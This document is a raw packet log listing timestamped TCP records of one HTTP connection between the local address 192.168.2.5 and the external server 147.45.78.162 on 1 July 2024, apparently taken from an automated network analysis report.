Jul 1, 2024 13:02:12.696538925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.696558952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.696572065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.696589947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.696619034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.696788073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.696825981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.696841002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.696852922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.696863890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.696882963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.696893930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.696907997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.700375080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.700421095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.700454950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.700468063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.700493097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.700511932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.700664043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.700676918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.700696945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.700707912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.700716019 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.700726032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.700737953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.700762987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.703722954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.703774929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.703784943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.703814030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.703854084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.703995943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.704006910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.704019070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.704030037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.704037905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.704073906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.704375982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.704418898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.705770016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.705811977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.705845118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.705856085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.705883980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.705893993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.706049919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.706062078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.706079006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.706085920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.706096888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.706104994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.706121922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.706139088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.706429958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.706470013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.708242893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.708287001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.708336115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.708348036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.708374977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.708385944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.708678007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.708688974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.708700895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.708713055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.708739996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.708750010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.708833933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.708873034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.710478067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.710520983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.710552931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.710565090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.710594893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.710603952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.710803986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.710815907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.710828066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.710839033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.710845947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.710854053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.710869074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.710886002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.713190079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.713234901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.713288069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.713299990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.713327885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.713339090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.713512897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.713552952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.713787079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.713851929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.713875055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.713886976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.713915110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.713923931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.714067936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.714109898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.715136051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.715178967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.715214014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.715225935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.715248108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.715265989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.715430975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.715441942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.715471029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.715481043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.715599060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.715637922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.715738058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.715780973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.732517004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.732537031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.732609987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.732631922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.732677937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.732702017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.732712984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.732739925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.732753992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.733019114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733032942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733043909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733057976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.733067036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733078003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.733105898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.733599901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733614922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733627081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733639002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733652115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.733659029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733670950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.733700037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.733740091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.756625891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.756735086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.756772041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.756791115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.756908894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.756908894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.756947994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.756958961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.756970882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.756983995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.756992102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.757009983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.757050037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.767103910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767146111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767158031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767174006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.767189980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.767201900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.767375946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767388105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767400026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767412901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767441034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.767472029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.767885923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.767932892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.768023014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.768034935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.768065929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.768095970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.768321037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.768332958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.768343925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.768354893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.768366098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.768383026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.768409967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.777623892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.777667046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.777678967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.777709007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.777745008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.777791023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.777833939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.777842045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.777879000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.778127909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.778140068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.778151035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.778167009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.778184891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.782165051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782217979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.782247066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782259941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782286882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.782449007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782463074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782497883 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.782687902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782699108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782710075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.782728910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.782756090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.787003994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.787064075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.787070990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.787084103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.787106037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.787127018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.787286997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.787298918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.787309885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.787322998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.787332058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.787364960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.792099953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.792123079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.792135000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.792146921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.792167902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.792371035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.792381048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.792396069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.792407036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.792416096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.792433977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.792458057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.795001030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.795053959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.795104027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.795115948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.795140028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.795160055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.795312881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.795325041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.795336008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.795347929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.795356989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.795389891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.798460007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.798513889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.798536062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.798547983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.798573017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.798589945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.798717976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.798728943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.798760891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.798916101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.798938036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.798959017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.798978090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.800477028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800506115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800518990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800529003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.800544024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.800559998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.800581932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800591946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800604105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800616026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.800637960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.800843000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800856113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.800879955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.800896883 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.802896023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.802947044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.802966118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.802977085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.803003073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.803143978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.803154945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.803184032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.803345919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.803355932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.803365946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.803386927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.803404093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.805051088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805078983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805089951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805099010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.805131912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.805243015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805254936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805279016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.805304050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.805445910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805457115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805468082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.805486917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.805504084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.808268070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.808324099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.808545113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.808557034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.808584929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.808603048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.808609962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.808621883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.808633089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.808644056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.808650970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.808667898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.808696032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.809973955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810014963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.810065031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810076952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810102940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.810120106 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.810257912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810295105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.810398102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810408115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810420036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810430050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.810441017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.810471058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.827238083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827291965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.827351093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827363014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827387094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.827416897 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.827727079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827739000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827749968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827760935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827771902 CEST	49705	80	192.168.2.5	147.45.78.162
